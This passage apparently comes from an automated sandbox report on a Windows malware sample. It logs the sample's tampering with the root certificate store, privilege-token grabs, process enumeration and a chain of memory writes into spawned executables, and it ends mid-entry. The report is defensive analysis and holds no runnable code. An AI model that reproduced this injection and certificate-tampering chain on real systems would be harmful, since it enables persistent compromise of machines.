04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e vtAyuNR3sRk30cmQP0sp8c0d.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e vtAyuNR3sRk30cmQP0sp8c0d.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e vtAyuNR3sRk30cmQP0sp8c0d.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 vtAyuNR3sRk30cmQP0sp8c0d.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 vtAyuNR3sRk30cmQP0sp8c0d.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 vtAyuNR3sRk30cmQP0sp8c0d.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4604 powershell.exe 4604 powershell.exe 4604 powershell.exe 4784 YfjcaqMeZJkgV91IIez0oMRl.tmp 4784 YfjcaqMeZJkgV91IIez0oMRl.tmp 5016 x2sfuoqahzZ1uPAD6UOCLQ4o.exe 5016 x2sfuoqahzZ1uPAD6UOCLQ4o.exe 4980 powershell.exe 4980 powershell.exe 4980 powershell.exe 4980 powershell.exe 5016 x2sfuoqahzZ1uPAD6UOCLQ4o.exe 5016 x2sfuoqahzZ1uPAD6UOCLQ4o.exe 5016 x2sfuoqahzZ1uPAD6UOCLQ4o.exe 5016 x2sfuoqahzZ1uPAD6UOCLQ4o.exe 5016 x2sfuoqahzZ1uPAD6UOCLQ4o.exe 5016 x2sfuoqahzZ1uPAD6UOCLQ4o.exe 3616 f0qRnAgqtZ9YKQTPPgHfpqoG.exe 3616 f0qRnAgqtZ9YKQTPPgHfpqoG.exe 5016 x2sfuoqahzZ1uPAD6UOCLQ4o.exe 5016 x2sfuoqahzZ1uPAD6UOCLQ4o.exe 5016 x2sfuoqahzZ1uPAD6UOCLQ4o.exe 5016 x2sfuoqahzZ1uPAD6UOCLQ4o.exe 3180 powershell.EXE 3180 powershell.EXE 3180 powershell.EXE 2084 updater.exe 2084 updater.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 2084 updater.exe 2084 updater.exe 2084 updater.exe 2084 updater.exe 2084 updater.exe 2084 updater.exe 3180 powershell.EXE 2084 updater.exe 2084 updater.exe 2188 powershell.exe 2188 powershell.exe 3120 powershell.exe 3120 powershell.exe 2188 powershell.exe 3120 powershell.exe 1016 conhost.exe 1016 conhost.exe 436 powershell.exe 436 powershell.exe 436 powershell.exe 3120 powershell.exe 436 powershell.exe 2188 powershell.exe 1016 conhost.exe 1016 conhost.exe 1016 conhost.exe 1016 conhost.exe 1016 conhost.exe 1016 conhost.exe 220 powershell.exe 220 powershell.exe 220 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 636 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 700 28e6b17dbc94ab578deb129913c5d938f1b4ef81ba9484009efa13be60c957a5.exe Token: SeDebugPrivilege 4604 powershell.exe Token: SeDebugPrivilege 700 28e6b17dbc94ab578deb129913c5d938f1b4ef81ba9484009efa13be60c957a5.exe Token: SeLoadDriverPrivilege 700 28e6b17dbc94ab578deb129913c5d938f1b4ef81ba9484009efa13be60c957a5.exe Token: SeIncreaseQuotaPrivilege 4604 powershell.exe Token: SeSecurityPrivilege 4604 powershell.exe Token: SeTakeOwnershipPrivilege 4604 powershell.exe Token: SeLoadDriverPrivilege 4604 powershell.exe Token: SeSystemProfilePrivilege 4604 powershell.exe Token: SeSystemtimePrivilege 4604 powershell.exe Token: SeProfSingleProcessPrivilege 4604 powershell.exe Token: SeIncBasePriorityPrivilege 4604 powershell.exe Token: SeCreatePagefilePrivilege 4604 powershell.exe Token: SeBackupPrivilege 4604 powershell.exe Token: SeRestorePrivilege 4604 powershell.exe Token: SeShutdownPrivilege 4604 powershell.exe Token: SeDebugPrivilege 4604 powershell.exe Token: SeSystemEnvironmentPrivilege 4604 powershell.exe Token: SeRemoteShutdownPrivilege 4604 powershell.exe Token: SeUndockPrivilege 4604 powershell.exe Token: SeManageVolumePrivilege 4604 powershell.exe Token: 33 4604 powershell.exe Token: 34 4604 powershell.exe Token: 35 4604 powershell.exe Token: 36 4604 powershell.exe Token: SeDebugPrivilege 3988 InstallUtil.exe Token: SeDebugPrivilege 4980 powershell.exe Token: SeDebugPrivilege 4068 VeEnOaBeAblogsTl0jqBJENx.exe Token: SeIncreaseQuotaPrivilege 4980 powershell.exe Token: SeSecurityPrivilege 4980 powershell.exe Token: SeTakeOwnershipPrivilege 4980 powershell.exe Token: SeLoadDriverPrivilege 4980 powershell.exe Token: SeSystemProfilePrivilege 4980 powershell.exe Token: SeSystemtimePrivilege 4980 powershell.exe Token: SeProfSingleProcessPrivilege 4980 powershell.exe Token: SeIncBasePriorityPrivilege 4980 powershell.exe Token: SeCreatePagefilePrivilege 4980 powershell.exe Token: SeBackupPrivilege 4980 powershell.exe Token: SeRestorePrivilege 4980 powershell.exe Token: SeShutdownPrivilege 4980 powershell.exe Token: SeDebugPrivilege 4980 powershell.exe Token: SeSystemEnvironmentPrivilege 4980 powershell.exe Token: SeRemoteShutdownPrivilege 4980 powershell.exe Token: SeUndockPrivilege 4980 powershell.exe Token: SeManageVolumePrivilege 4980 powershell.exe Token: 33 4980 powershell.exe Token: 34 4980 powershell.exe Token: 35 4980 powershell.exe Token: 36 4980 powershell.exe Token: SeShutdownPrivilege 1920 powercfg.exe Token: SeCreatePagefilePrivilege 1920 powercfg.exe Token: SeShutdownPrivilege 3256 powercfg.exe Token: SeCreatePagefilePrivilege 3256 powercfg.exe Token: SeShutdownPrivilege 4532 powercfg.exe Token: SeCreatePagefilePrivilege 4532 powercfg.exe Token: SeShutdownPrivilege 3552 powercfg.exe Token: SeCreatePagefilePrivilege 3552 powercfg.exe Token: SeDebugPrivilege 4420 DigitalPulseService.exe Token: SeDebugPrivilege 3180 powershell.EXE Token: SeDebugPrivilege 4476 powershell.exe Token: SeShutdownPrivilege 3572 powercfg.exe Token: SeCreatePagefilePrivilege 3572 powercfg.exe Token: SeShutdownPrivilege 2504 powercfg.exe Token: SeCreatePagefilePrivilege 2504 powercfg.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4784 YfjcaqMeZJkgV91IIez0oMRl.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 700 wrote to memory of 4604 700 28e6b17dbc94ab578deb129913c5d938f1b4ef81ba9484009efa13be60c957a5.exe 71 PID 700 wrote to memory of 4604 700 28e6b17dbc94ab578deb129913c5d938f1b4ef81ba9484009efa13be60c957a5.exe 71 PID 700 wrote to memory of 3988 700 28e6b17dbc94ab578deb129913c5d938f1b4ef81ba9484009efa13be60c957a5.exe 73 PID 700 wrote to memory of 3988 700 28e6b17dbc94ab578deb129913c5d938f1b4ef81ba9484009efa13be60c957a5.exe 73 PID 700 wrote to memory of 3988 700 28e6b17dbc94ab578deb129913c5d938f1b4ef81ba9484009efa13be60c957a5.exe 73 PID 700 wrote to memory of 3988 700 28e6b17dbc94ab578deb129913c5d938f1b4ef81ba9484009efa13be60c957a5.exe 73 PID 700 wrote to memory of 3988 700 28e6b17dbc94ab578deb129913c5d938f1b4ef81ba9484009efa13be60c957a5.exe 73 PID 700 wrote to memory of 3988 700 28e6b17dbc94ab578deb129913c5d938f1b4ef81ba9484009efa13be60c957a5.exe 73 PID 700 wrote to memory of 3988 700 28e6b17dbc94ab578deb129913c5d938f1b4ef81ba9484009efa13be60c957a5.exe 73 PID 700 wrote to memory of 3988 700 28e6b17dbc94ab578deb129913c5d938f1b4ef81ba9484009efa13be60c957a5.exe 73 PID 3988 wrote to memory of 3200 3988 InstallUtil.exe 78 PID 3988 wrote to memory of 3200 3988 InstallUtil.exe 78 PID 3988 wrote to memory of 3200 3988 InstallUtil.exe 78 PID 3988 wrote to memory of 5012 3988 InstallUtil.exe 77 PID 3988 wrote to memory of 5012 3988 InstallUtil.exe 77 PID 3988 wrote to memory of 5012 3988 InstallUtil.exe 77 PID 3988 wrote to memory of 5016 3988 InstallUtil.exe 75 PID 3988 wrote to memory of 5016 3988 InstallUtil.exe 75 PID 3988 wrote to memory of 4064 3988 InstallUtil.exe 76 PID 3988 wrote to memory of 4064 3988 InstallUtil.exe 76 PID 3988 wrote to memory of 4064 3988 InstallUtil.exe 76 PID 3988 wrote to memory of 4508 3988 InstallUtil.exe 83 PID 3988 wrote to memory of 4508 3988 InstallUtil.exe 83 PID 3988 wrote to memory of 4508 3988 InstallUtil.exe 83 PID 3988 wrote to memory of 3616 3988 InstallUtil.exe 80 PID 3988 wrote to memory of 3616 3988 InstallUtil.exe 80 PID 3988 wrote to memory of 3616 3988 InstallUtil.exe 80 PID 3200 wrote to memory of 2932 3200 vtAyuNR3sRk30cmQP0sp8c0d.exe 79 PID 3200 wrote to memory of 2932 3200 vtAyuNR3sRk30cmQP0sp8c0d.exe 79 PID 3200 wrote to memory of 2932 3200 vtAyuNR3sRk30cmQP0sp8c0d.exe 79 PID 3988 wrote to memory of 4068 3988 InstallUtil.exe 81 PID 3988 wrote to memory of 4068 3988 InstallUtil.exe 81 PID 3988 wrote to memory of 4068 3988 InstallUtil.exe 81 PID 4508 wrote to memory of 4784 4508 YfjcaqMeZJkgV91IIez0oMRl.exe 82 PID 4508 wrote to memory of 4784 4508 YfjcaqMeZJkgV91IIez0oMRl.exe 82 PID 4508 wrote to memory of 4784 4508 YfjcaqMeZJkgV91IIez0oMRl.exe 82 PID 3200 wrote to memory of 4156 3200 vtAyuNR3sRk30cmQP0sp8c0d.exe 85 PID 3200 wrote to memory of 4156 3200 vtAyuNR3sRk30cmQP0sp8c0d.exe 85 PID 3200 wrote to memory of 4156 3200 vtAyuNR3sRk30cmQP0sp8c0d.exe 85 PID 3988 wrote to memory of 3824 3988 InstallUtil.exe 84 PID 3988 wrote to memory of 3824 3988 InstallUtil.exe 84 PID 3988 wrote to memory of 3824 3988 InstallUtil.exe 84 PID 3200 wrote to memory of 4436 3200 vtAyuNR3sRk30cmQP0sp8c0d.exe 86 PID 3200 wrote to memory of 4436 3200 vtAyuNR3sRk30cmQP0sp8c0d.exe 86 PID 3200 wrote to memory of 4436 3200 vtAyuNR3sRk30cmQP0sp8c0d.exe 86 PID 3824 wrote to memory of 2056 3824 85dF8Pvye4bZ18FyCDaP1jhH.exe 87 PID 3824 wrote to memory of 2056 3824 85dF8Pvye4bZ18FyCDaP1jhH.exe 87 PID 3824 wrote to memory of 2056 3824 85dF8Pvye4bZ18FyCDaP1jhH.exe 87 PID 4436 wrote to memory of 4760 4436 vtAyuNR3sRk30cmQP0sp8c0d.exe 88 PID 4436 wrote to memory of 4760 4436 vtAyuNR3sRk30cmQP0sp8c0d.exe 88 PID 4436 wrote to memory of 4760 4436 vtAyuNR3sRk30cmQP0sp8c0d.exe 88 PID 4784 